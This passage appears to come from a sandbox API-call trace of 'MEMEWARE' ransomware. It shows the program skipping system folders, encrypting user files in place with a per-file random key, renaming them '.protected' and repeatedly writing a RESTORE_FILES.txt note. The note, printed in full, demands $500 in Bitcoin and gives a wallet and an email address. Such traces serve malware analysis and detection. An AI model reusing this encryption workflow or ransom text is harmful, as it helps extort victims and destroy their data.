returned 1 [0094.100] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Windows") returned -1 [0094.100] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Program Files") 
returned -1 [0094.100] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Program Files (x86)") returned -1 [0094.100] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="$Recycle.bin") returned 1 [0094.100] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="System Volume Information") returned -1 [0094.100] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 104 [0094.100] StrStrIW (lpFirst="12_All_Video.wpl", lpSrch=".protected") returned 0x0 [0094.100] lstrcmpW (lpString1="12_All_Video.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0094.100] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.100] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.101] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 104 [0094.101] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".txt") returned 0x0 [0094.101] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 104 [0094.101] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".rar") returned 0x0 [0094.101] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 104 [0094.101] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".zip") returned 0x0 [0094.101] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x437, lpOverlapped=0x0) returned 1 [0094.103] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbc9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.103] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x437, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x437, lpOverlapped=0x0) returned 1 [0094.103] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.103] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.103] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.103] CloseHandle (hObject=0x158) returned 1 [0094.103] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.protected") returned 114 [0094.103] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync 
playlists\\en-us\\00010c6e\\12_all_video.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl.protected")) returned 1 [0094.104] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0094.104] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0094.104] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\RESTORE_FILES.txt") returned 105 [0094.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0094.105] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.105] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0094.106] lstrlenA (lpString="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") returned 684 [0094.106] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.106] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.106] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.106] CloseHandle (hObject=0x154) returned 1 [0094.106] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0094.106] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0094.106] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\RESTORE_FILES.txt") returned 96 [0094.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.107] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.107] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0094.108] lstrlenA (lpString="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") returned 684 [0094.108] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0094.108] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.108] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.108] CloseHandle (hObject=0x150) returned 1 [0094.108] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.108] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.108] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\RESTORE_FILES.txt") returned 90 [0094.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.109] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.109] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.110] lstrlenA (lpString="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") returned 684 [0094.110] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.110] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.110] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.110] CloseHandle (hObject=0x14c) returned 1 [0094.111] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.111] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.111] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\RESTORE_FILES.txt") returned 75 [0094.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.112] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.112] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.113] lstrlenA (lpString="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") returned 684 [0094.113] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.113] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.113] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.113] CloseHandle (hObject=0xd8) returned 1 [0094.113] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.113] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0094.113] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.113] lstrcmpiW (lpString1="Windows Mail", lpString2="Windows") returned 1 [0094.113] lstrcmpiW (lpString1="Windows Mail", lpString2="Program Files") returned 1 [0094.113] lstrcmpiW (lpString1="Windows Mail", lpString2="Program Files (x86)") returned 1 [0094.113] lstrcmpiW (lpString1="Windows Mail", lpString2="$Recycle.bin") returned 1 [0094.113] lstrcmpiW (lpString1="Windows Mail", lpString2="System Volume Information") returned 1 [0094.113] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail") returned 57 [0094.113] lstrcmpW (lpString1="Windows Mail", lpString2=".") returned 1 [0094.113] lstrcmpW (lpString1="Windows Mail", lpString2="..") returned 1 [0094.113] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\*") returned 59 [0094.113] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.124] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.124] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.124] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.124] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.124] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.124] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\.") returned 59 [0094.124] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.124] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.124] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.124] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.124] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.124] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.124] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.124] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\..") returned 60 [0094.124] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.124] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.124] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.124] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="Windows") returned -1 [0094.124] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="Program Files") returned -1 [0094.124] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="Program Files (x86)") returned -1 [0094.124] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="$Recycle.bin") returned 1 [0094.124] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="System Volume Information") returned -1 [0094.124] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 113 [0094.124] 
StrStrIW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".protected") returned 0x0 [0094.124] lstrcmpW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="RESTORE_FILES.txt") returned -1 [0094.124] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.125] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.125] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 113 [0094.125] StrStrW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".txt") returned 0x0 [0094.126] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 113 [0094.126] StrStrW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".rar") returned 0x0 [0094.126] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 113 [0094.126] StrStrW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".zip") returned 0x0 [0094.126] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, 
lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x5e4, lpOverlapped=0x0) returned 1 [0094.162] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffa1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.162] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x5e4, lpOverlapped=0x0) returned 1 [0094.163] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.163] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.163] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.163] CloseHandle (hObject=0x14c) returned 1 [0094.163] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.protected") returned 123 [0094.163] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows 
mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount.protected")) returned 1 [0094.164] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.164] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="Windows") returned -1 [0094.164] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="Program Files") returned -1 [0094.164] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="Program Files (x86)") returned -1 [0094.164] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="$Recycle.bin") returned 1 [0094.165] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="System Volume Information") returned -1 [0094.165] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 113 [0094.165] StrStrIW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".protected") returned 0x0 [0094.165] lstrcmpW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="RESTORE_FILES.txt") returned -1 [0094.165] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.184] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, 